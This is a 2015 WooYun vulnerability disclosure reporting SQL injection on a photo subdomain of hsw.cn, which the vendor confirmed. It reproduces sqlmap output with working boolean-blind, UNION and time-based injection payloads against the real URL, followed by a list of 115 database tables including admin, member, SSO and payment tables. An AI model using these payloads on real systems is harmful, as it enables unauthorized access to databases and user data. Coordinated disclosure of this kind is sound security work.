当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117376

漏洞标题:华商网某站存在SQL注入可跨库

相关厂商:hsw.cn

漏洞作者: 深度安全实验室

提交时间:2015-06-01 16:16

修复时间:2015-07-17 16:24

公开时间:2015-07-17 16:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-01: 细节已通知厂商并且等待厂商处理中
2015-06-02: 厂商已经确认,细节仅向厂商公开
2015-06-12: 细节向核心白帽子及相关领域专家公开
2015-06-22: 细节向普通白帽子公开
2015-07-02: 细节向实习白帽子公开
2015-07-17: 细节向公众公开

简要描述:

详细说明:

http://photo.hsw.cn:80/Activity/index/catid/24


901.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://photo.hsw.cn:80/Activity/index/catid/24) AND 2978=2978 AND (5251=5251
Type: UNION query
Title: MySQL UNION query (NULL) - 22 columns
Payload: http://photo.hsw.cn:80/Activity/index/catid/24) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7173677071,0x54576a744b4d4d75536c,0x7177756271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://photo.hsw.cn:80/Activity/index/catid/24) AND SLEEP(5) AND (4494=4494
---
back-end DBMS: MySQL 5.0.11
Database: hsfoto
[115 tables]
+-----------------------+
| hs_admin |
| hs_admin_panel |
| hs_admin_role |
| hs_admin_role_priv |
| hs_announce |
| hs_attachment |
| hs_attachment_index |
| hs_badword |
| hs_block |
| hs_block_history |
| hs_block_priv |
| hs_cache |
| hs_category |
| hs_category_priv |
| hs_collection_content |
| hs_collection_history |
| hs_collection_node |
| hs_collection_program |
| hs_comment |
| hs_comment_check |
| hs_comment_data_1 |
| hs_comment_setting |
| hs_comment_table |
| hs_content_check |
| hs_copyfrom |
| hs_datacall |
| hs_dbsource |
| hs_download |
| hs_download_data |
| hs_downservers |
| hs_extend_setting |
| hs_favorite |
| hs_foto_article |
| hs_foto_article_data |
| hs_foto_city |
| hs_foto_city_data |
| hs_foto_follow |
| hs_foto_images |
| hs_foto_tag |
| hs_foto_works |
| hs_foto_works_data |
| hs_hits |
| hs_ipbanned |
| hs_keylink |
| hs_keyword |
| hs_keyword_data |
| hs_like |
| hs_link |
| hs_linkage |
| hs_log |
| hs_loginkey |
| hs_member |
| hs_member_detail |
| hs_member_group |
| hs_member_menu |
| hs_member_verify |
| hs_member_vip |
| hs_menu |
| hs_model |
| hs_model_field |
| hs_module |
| hs_mood |
| hs_news |
| hs_news_data |
| hs_notice |
| hs_openlogin |
| hs_page |
| hs_pay_account |
| hs_pay_payment |
| hs_pay_spend |
| hs_picture |
| hs_picture_data |
| hs_position |
| hs_position_data |
| hs_poster |
| hs_poster_201408 |
| hs_poster_201409 |
| hs_poster_201410 |
| hs_poster_201411 |
| hs_poster_201412 |
| hs_poster_201501 |
| hs_poster_201502 |
| hs_poster_201503 |
| hs_poster_201504 |
| hs_poster_201505 |
| hs_poster_space |
| hs_queue |
| hs_release_point |
| hs_search |
| hs_search_keyword |
| hs_session |
| hs_site |
| hs_special |
| hs_special_c_data |
| hs_special_content |
| hs_sphinx_counter |
| hs_sso_admin |
| hs_sso_applications |
| hs_sso_members |
| hs_sso_messagequeue |
| hs_sso_session |
| hs_sso_settings |
| hs_tag |
| hs_template_bak |
| hs_times |
| hs_type |
| hs_urlrule |
| hs_video |
| hs_video_content |
| hs_video_data |
| hs_video_store |
| hs_workflow |
| hs_zt_dream |
| hs_zt_dream_ip |
| hs_zt_dream_token |
+-----------------------+

902.png


hscenter库:

903.png

904.png

漏洞证明:

这个得多给点分吧~

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-06-02 16:23

厂商回复:

最新状态:

暂无


漏洞评价:

评论